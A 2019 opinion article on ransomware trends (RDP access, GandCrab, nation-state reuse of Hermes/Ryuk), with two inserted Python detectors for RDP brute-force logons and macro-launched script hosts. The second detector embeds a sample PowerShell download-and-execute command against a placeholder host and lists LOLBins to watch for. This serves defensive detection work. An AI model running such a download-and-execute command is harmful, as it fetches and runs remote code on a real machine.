Opinion: 4 Ransomware trends to watch in 2019

By Contributor
Thu 14 Feb 2019

Article by Recorded Future senior solutions architect Allan Liska

At the end of each of the last two years, I have written an article predicting ransomware trends for the coming year. Each article was a mix of accurate and inaccurate predictions, fortunately more accurate than inaccurate.

In 2018, the division between the “haves” and “have nots” of ransomware campaigns continued to grow. The “haves” — ransomware actors who continued to make a lot of money and successfully exploit many targets — focused on health care and government (or quasi-government agencies) and these actors avoided traditional phishing or web exploitation campaigns.

The biggest ransomware story of 2018, arguably, happened in the city of Atlanta. The SamSam team hit the city hard, disrupting vital services for days and leaving some data completely unrecoverable. But Atlanta wasn’t the only city or state government hit. There were dozens of stories about cities, utilities, ports, and more that were infected with ransomware in 2018.

Since ransomware attacks continue to challenge all types of organisations (and not just health care and government), here are the anticipated trends in ransomware for 2019.

1. The ransomware market will continue to grow, but few campaigns will have impact

In January of 2017, Recorded Future was tracking 635 ransomware campaigns. In February of 2018, that number was 1,105, and at the end of January 2019, we are tracking 1,463 campaigns. While the number of ransomware variants continues to expand rapidly, the truth is that most of these campaigns are ineffective and die out quickly.

An example of this phenomenon is the Cryptgh0st ransomware shown below. It was first discovered in May 2018 and by the end of August, virtually all mentions of the ransomware disappeared. Cryptgh0st does not appear to have been widely deployed on victim machines, and the Bitcoin wallet associated with the campaign only shows two incoming transactions — one for about $370 and a second for $6.

There are dozens of ransomware campaigns that follow a similar pattern, where the biggest noise comes from the fake “how to remove X ransomware” websites, but they generate very little real threat.

2. Successful ransomware campaigns will continue to rely on open RDP

Most successful campaigns in 2018 involved ransomware that relies on open Remote Desktop Protocol (RDP) servers as the initial access point. Ransomware families such as SamSam, BitPaymer, and CrySiS thrived because they went in through RDP rather than through web exploitation or phishing, whereas many campaigns that still depended on web exploitation or phishing to gain access to victim networks failed.

These campaigns look for networks that have internet-facing servers running the RDP service. Attackers either take advantage of well-known vulnerabilities in unpatched servers or use a brute-force password attack (trying common login names, such as “administrator,” along with thousands of common passwords to gain access). Once the attackers have successfully gained access to the exposed system, they use it as a jumping off point into the core of the network, installing their ransomware onto target machines and often disabling backups and other protections.
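The brute-force stage described above leaves a distinctive trail in the Windows Security log: a burst of failed logons (Event ID 4625) from one source address, often cycling through account names such as "administrator", sometimes followed by a success (Event ID 4624). The detector below is an added example, not code from the article or from Recorded Future; it runs over constructed sample events written in a simplified whitespace-delimited form (timestamp, event ID, logon type, account, source IP) rather than the real EVTX/XML layout, so the parser is an assumption you would replace with your log pipeline's own field extraction. The threshold and window are assumptions as well. Logon type 10 is RemoteInteractive (classic RDP); type 3 is included because RDP with Network Level Authentication logs the credential check as a network logon.

```python
"""
RDP brute-force detection over Windows Security log events.

Added example (not from the original article). Consumes constructed
sample events in the form:
    <ISO-8601 timestamp> <EventID> <LogonType> <Account> <SourceIP>
and flags (a) source IPs that exceed FAIL_THRESHOLD failed logons
inside WINDOW, and (b) any successful logon from a source that had
such a burst of failures immediately before it.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5                 # assumption: tune for your environment
WINDOW = timedelta(seconds=60)     # assumption: sliding window length
RDP_LOGON_TYPES = {"10", "3"}      # 10 = RemoteInteractive, 3 = Network (NLA)

# Constructed sample data: one noisy source cycling account names, one user
# who mistypes a password twice, and a console (LogonType 2) failure that is
# not RDP and must be ignored.
SAMPLE_EVENTS = [
    "2018-03-22T02:14:01Z 4625 10 administrator 203.0.113.45",
    "2018-03-22T02:14:03Z 4625 10 administrator 203.0.113.45",
    "2018-03-22T02:14:05Z 4625 10 admin 203.0.113.45",
    "2018-03-22T02:14:07Z 4625 10 admin 203.0.113.45",
    "2018-03-22T02:14:09Z 4625 10 administrator 203.0.113.45",
    "2018-03-22T02:14:11Z 4625 10 administrator 203.0.113.45",
    "2018-03-22T02:14:40Z 4624 10 administrator 203.0.113.45",
    "2018-03-22T02:15:00Z 4625 10 jsmith 198.51.100.7",
    "2018-03-22T02:15:20Z 4625 10 jsmith 198.51.100.7",
    "2018-03-22T02:15:45Z 4624 10 jsmith 198.51.100.7",
    "2018-03-22T02:16:00Z 4625 2 svc_backup 127.0.0.1",
]


def parse_event(line):
    """Split one simplified event line into a dict with a datetime timestamp."""
    ts, event_id, logon_type, account, src = line.split()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "event_id": int(event_id),
        "logon_type": logon_type,
        "account": account.lower(),
        "src": src,
    }


def detect_rdp_bruteforce(lines, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return a list of alert dicts, in time order, for RDP brute-force activity."""
    events = sorted((parse_event(l) for l in lines), key=lambda e: e["ts"])
    recent_failures = defaultdict(deque)   # src IP -> timestamps of failures in window
    accounts_tried = defaultdict(set)      # src IP -> account names seen failing
    flagged = set()                        # sources already reported, to avoid repeats
    alerts = []

    for e in events:
        if e["logon_type"] not in RDP_LOGON_TYPES:
            continue
        q = recent_failures[e["src"]]
        # Drop failures that have aged out of the sliding window.
        while q and e["ts"] - q[0] > window:
            q.popleft()

        if e["event_id"] == 4625:
            q.append(e["ts"])
            accounts_tried[e["src"]].add(e["account"])
            if len(q) >= threshold and e["src"] not in flagged:
                flagged.add(e["src"])
                alerts.append({
                    "type": "bruteforce",
                    "src": e["src"],
                    "failures": len(q),
                    "accounts": sorted(accounts_tried[e["src"]]),
                    "at": e["ts"],
                })
        elif e["event_id"] == 4624 and len(q) >= threshold:
            # A success right after a burst of failures is the signal that
            # matters most: the attacker is now on the box.
            alerts.append({
                "type": "bruteforce_success",
                "src": e["src"],
                "account": e["account"],
                "failures_before": len(q),
                "at": e["ts"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

On the sample data the detector raises two alerts for 203.0.113.45 (the burst itself, then the successful "administrator" logon that follows it) and nothing for the user who simply mistyped a password. The "bruteforce_success" alert is the one to page on: at that point the attacker has the foothold the article describes, and the next steps (lateral movement, disabling backups) tend to follow quickly.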

Of course, it’s not just RDP that these attackers use. As seen with SamSam, CrySiS, and BitPaymer, attackers look for any service that may give them access to the core of the network. JBoss, FTP, and other services have all been targets of these groups, but open RDP servers are the preferred target because there are a lot of them, they are easy to find, and they are easy to exploit. Even better, if an attacker is having trouble exploiting open RDP servers, they can just purchase access on underground markets for about $15, as shown below.

Publicly accessible RDP servers are widely available for a couple of reasons. The first is that many organisations use RDP instead of a VPN to gain remote access to their work or home machines. The second reason is that organisations are often not aware that the RDP service is running on internet-facing servers. This could be a configuration error, a failed security check, or a case of the service being started by another service after the server is deployed.

It is worth noting that with the recent takedown of the xDedic marketplace, the pool of readily available, low-priced, RDP servers may be in short supply, at least until a new dominant marketplace emerges. That won’t slow down the more sophisticated ransomware teams who scan and infect their own RDP servers, but it may impact some of the less sophisticated campaigns.

Almost every headline-grabbing ransomware story in 2018 involved criminals who accessed the victim networks through a poorly secured RDP server, as shown in the timeline below. Note how the trend line stayed consistent throughout the year. Expect that to continue into 2019, at least until organisations figure out how to secure or remove their RDP servers.

3. GandCrab will continue to ignore this list and somehow be successful

The exception to the first two trends on this list continues to be GandCrab ransomware — one of the few widely deployed ransomware campaigns. The GandCrab team eschews RDP for phishing and exploit kit-based campaigns. GandCrab ransomware was first reported at the end of January 2018, and since then, the team behind GandCrab has made dozens of adjustments and at least five new code releases.

The GandCrab team is very responsive to security researchers, often including references to reports about their ransomware and how the team has adapted to those reports in their underground ads. Delivered primarily via phishing campaigns (though they also use exploit kits), the GandCrab team relies heavily on Microsoft Office macros, VBScript, and PowerShell to avoid detection, but will often incorporate new means of exploitation and avoidance as proof-of-concept code is released.
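The delivery chain just described (Office document with a macro that launches VBScript or PowerShell) produces a process tree that is easy to test for: an Office binary as the parent of a script host. The detector below is an added example, not code from the article or from any GandCrab analysis; it runs over constructed process-creation records laid out with Sysmon Event ID 1 field names (ParentImage, Image, CommandLine), which is an assumption about your telemetry source. It also decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE), a common way macro payloads hide the real command. The encoded sample payload is built inside the block from a harmless placeholder URL, not taken from any real campaign.

```python
"""
Detect Office applications spawning script interpreters.

Added example (not from the original article). Input records are
constructed dicts using Sysmon Event ID 1 field names. A finding is
raised when an Office parent process launches a script host; any
PowerShell -EncodedCommand payload is decoded so the analyst can read
the actual command instead of a base64 blob.
"""
import base64
import re

# Office binaries that a macro would be running inside (assumption: extend
# for other document-handling parents you care about).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                  "outlook.exe", "msaccess.exe", "mspub.exe"}
# Interpreters and LOLBins a macro typically hands off to.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}

# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...);
# this pattern covers the common spellings and grabs the base64 token after it.
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed sample payload: what a macro-launched PowerShell stage often
# looks like (download-and-execute), encoded the way -EncodedCommand expects.
PLAINTEXT_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENCODED_PAYLOAD = base64.b64encode(PLAINTEXT_PAYLOAD.encode("utf-16le")).decode()

# Constructed sample records: two malicious chains, two benign processes.
SAMPLE_PROCESSES = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + ENCODED_PAYLOAD},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //B C:\Users\Public\invoice.vbs"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},     # admin, benign
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},                              # print helper, benign
]


def basename(path):
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, None if absent, or a marker if undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable -EncodedCommand payload>"


def detect_office_script_spawns(records):
    """Return findings for every Office parent -> script host child in records."""
    findings = []
    for r in records:
        parent, child = basename(r["ParentImage"]), basename(r["Image"])
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            findings.append({
                "parent": parent,
                "child": child,
                "command": r["CommandLine"],
                "decoded": decode_encoded_command(r["CommandLine"]),
            })
    return findings


if __name__ == "__main__":
    for f in detect_office_script_spawns(SAMPLE_PROCESSES):
        print(f["parent"], "->", f["child"])
        print("   ", f["decoded"] or f["command"])
```

The parent/child pairing is the durable signal here: the macro code, the obfuscation, and the download host all change between GandCrab releases, but a spreadsheet has very few legitimate reasons to start wscript.exe or a hidden PowerShell. Decoding the encoded command is what turns the alert into something an analyst can act on.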

GandCrab uses a ransomware-as-a-service (RaaS) model to maximise delivery and focuses primarily on consumer delivery, with ransom demands ranging from $500 to $600. Although consumer tools such as free mail services and anti-virus vendors have gotten better at detecting ransomware, GandCrab continues to find success, as shown in the timeline below.

The team behind GandCrab doesn’t appear to be slowing down at all, so expect to see more from them in 2019.

4. Nation-states and cybercriminals will continue to blend ransomware attacks

2018 saw the rise of nation-state threat actors using cryptocurrency mining and ransomware campaigns as a way to generate revenue for the state or distract from other activities. Ransomware was not only used as a distraction or destruction tool, but also as a money-making tool.

This trend will continue in 2019, especially with countries that are heavily sanctioned — however, the twist is that these countries will use the same ransomware tools that the criminals are using so that they blend in with all of the other campaigns.

As shown in the timeline below, Hermes ransomware was originally marketed on Russian forums and used by cybercriminals. The Lazarus group, which is linked to North Korea, has also used the Hermes ransomware in at least one attack.

When Ryuk ransomware first appeared in late 2018, many researchers assumed it was tied to North Korea as well because Ryuk ransomware shares much of its code base with Hermes ransomware. However, further research determined that the Ryuk actors are most likely located in Russia and they had built Ryuk ransomware using (most likely stolen) Hermes code.

As ransomware actors become more sophisticated, the code stealing (or sharing) will become a two-way street, and nation-state actors may very well use cybercriminal code to build their ransomware variants.


One thing that has held true through the rise, plateau, and decline of ransomware campaigns is that the most successful ransomware actors are very nimble and quickly adapt their techniques to the changing security landscape.

Many organisations have put in phishing countermeasures and are still cautioning those users on their network to watch for phishing-based ransomware attacks. This is not necessarily bad advice, but as successful ransomware actors migrate to other means of access, these protections become less effective against ransomware.

Just as ransomware teams adjust their attacks based on the changing security landscape, security teams need to be able to adjust their focus and protections. Understanding what techniques are being used by ransomware actors allows security teams to be more responsive to the current threats and adapt their protections to keep their organisation safe.
